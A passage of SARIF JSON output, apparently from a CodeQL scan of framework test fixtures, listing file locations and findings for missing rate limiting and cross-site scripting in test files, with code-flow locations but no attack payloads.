UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":506}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":508}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":509}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":510}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":512}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":514}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json","uriBaseId":"%SRCROOT%","index":516}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json","uriBaseId":"%SRCROOT%","index":517}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml","uriBaseId":"%SRCROOT%","index":518}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html","uriBaseId":"%SRCROOT%","index":520}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":521}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":522}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":523}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json","uriBaseId":"%SRCROOT%","index":524}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml","uriBaseId":"%SRCROOT%","index":525}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json","uriBaseId":"%SRCROOT%","index":526}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":527}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json","uriBaseId":"%SRCROOT%","index":528}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html","uriBaseId":"%SRCROOT%","index":529}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":531}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":532}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json","uriBaseId":"%SRCROOT%","index":533}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json","uriBaseId":"%SRCROOT%","index":534}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":535}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":536}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":537}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":538}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":539}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":540}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json","uriBaseId":"%SRCROOT%","index":541}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":542}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json","uriBaseId":"%SRCROOT%","index":543}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":544}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":545}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":546}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":547}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":548}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":549}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":550}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":551}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json","uriBaseId":"%SRCROOT%","index":552}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json","uriBaseId":"%SRCROOT%","index":553}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":554}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":556}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":558}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json","uriBaseId":"%SRCROOT%","index":560}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json","uriBaseId":"%SRCROOT%","index":561}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":562}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":563}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":564}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":565}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":566}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":567}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json","uriBaseId":"%SRCROOT%","index":568}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json","uriBaseId":"%SRCROOT%","index":569}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml","uriBaseId":"%SRCROOT%","index":570}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":571}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":572}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":573}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html","uriBaseId":"%SRCROOT%","index":574}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":575}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":576}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":577}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json","uriBaseId":"%SRCROOT%","index":578}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml","uriBaseId":"%SRCROOT%","index":579}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":580}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json","uriBaseId":"%SRCROOT%","index":581}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":582}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html","uriBaseId":"%SRCROOT%","index":584}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":586}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json","uriBaseId":"%SRCROOT%","index":588}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml","uriBaseId":"%SRCROOT%","index":590}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml","uriBaseId":"%SRCROOT%","index":591}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html","uriBaseId":"%SRCROOT%","index":592}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js","uriBaseId":"%SRCROOT%","index":593}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":594}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml","uriBaseId":"%SRCROOT%","index":595}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json","uriBaseId":"%SRCROOT%","index":596}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":597}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json","uriBaseId":"%SRCROOT%","index":598}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":599}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":600}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":601}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":602}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json","uriBaseId":"%SRCROOT%","index":603}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json","uriBaseId":"%SRCROOT%","index":604}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml","uriBaseId":"%SRCROOT%","index":605}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":606}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html","uriBaseId":"%SRCROOT%","index":607}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js","uriBaseId":"%SRCROOT%","index":608}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":609}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":610}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":611}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":612}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json","uriBaseId":"%SRCROOT%","index":613}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json","uriBaseId":"%SRCROOT%","index":614}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml","uriBaseId":"%SRCROOT%","index":615}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":616}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html","uriBaseId":"%SRCROOT%","index":617}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js","uriBaseId":"%SRCROOT%","index":618}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":619}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":620}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":621}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":622}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":623}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/.eslintrc.json","uriBaseId":"%SRCROOT%","index":624}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package.json","uriBaseId":"%SRCROOT%","index":625}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/public/index.html","uriBaseId":"%SRCROOT%","index":626}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":627}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":628}},{"location":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package-lock.json","uriBaseId":"%SRCROOT%","index":629}},{"location":{"uri":"javascript/frameworks/xsjs/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":630}},{"location":{"uri":"javascript/frameworks/xsjs/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":631}},{"location":{"uri":"javascript/frameworks/xsjs/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":632}},{"location":{"uri":"javascript/frameworks/xsjs/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":633}},{"location":{"uri":"javascript/frameworks/xsjs/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":634}},{"location":{"uri":"javascript/frameworks/xsjs/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":635}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/.xsaccess","uriBaseId":"%SRCROOT%","index":636}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":637}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":638}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/service.xsjs","uriBaseId":"%SRCROOT%","index":639}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":640}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643}},{"location":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644}},{"location":{"uri":"javascript/heuristic-models/tests/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":645}},{"location":{"uri":"javascript/heuristic-models/tests/qlpack.yml","uriBaseId":"%SRCROOT%","index":646}},{"location":{"uri":"qlt.conf.json","uriBaseId":"%SRCROOT%","index":647}},{"location":{"uri":"file:/opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/javascript/tools/data/externs/web/window.js","index":648}},{"location":{"uri":"scripts/CreateTestsFromYaml.py","uriBaseId":"%SRCROOT%","index":649}}],"results":[{"ruleId":"js/missing-rate-limiting","rule":{"id":"js/missing-rate-limiting","index":10,"toolComponent":{"index":1}},"message":{"text":"This route handler performs [a database access](1), but is not rate-limited."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":781,"startColumn":23,"endLine":784,"endColumn":6}}}],"partialFingerprints":{"primaryLocationLineHash":"ac6d3bdd3d52ea9b:1","primaryLocationStartColumnFingerprint":"18"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":7,"endLine":783,"endColumn":9}},"message":{"text":"a database access"}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":4,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"6311a9ed7e4091a4:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":4,"startColumn":20,"endColumn":25}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":11,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"8e517fc6fdf32a1a:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":11,"startColumn":20,"endColumn":25}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":19,"startColumn":20,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"c51cf11a085c01f4:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":19,"startColumn":20,"endColumn":26}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/xss","rule":{"id":"js/xss","index":33,"toolComponent":{"index":1}},"message":{"text":"Cross-site scripting vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":27,"startColumn":20,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"e309bf8540256a05:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... 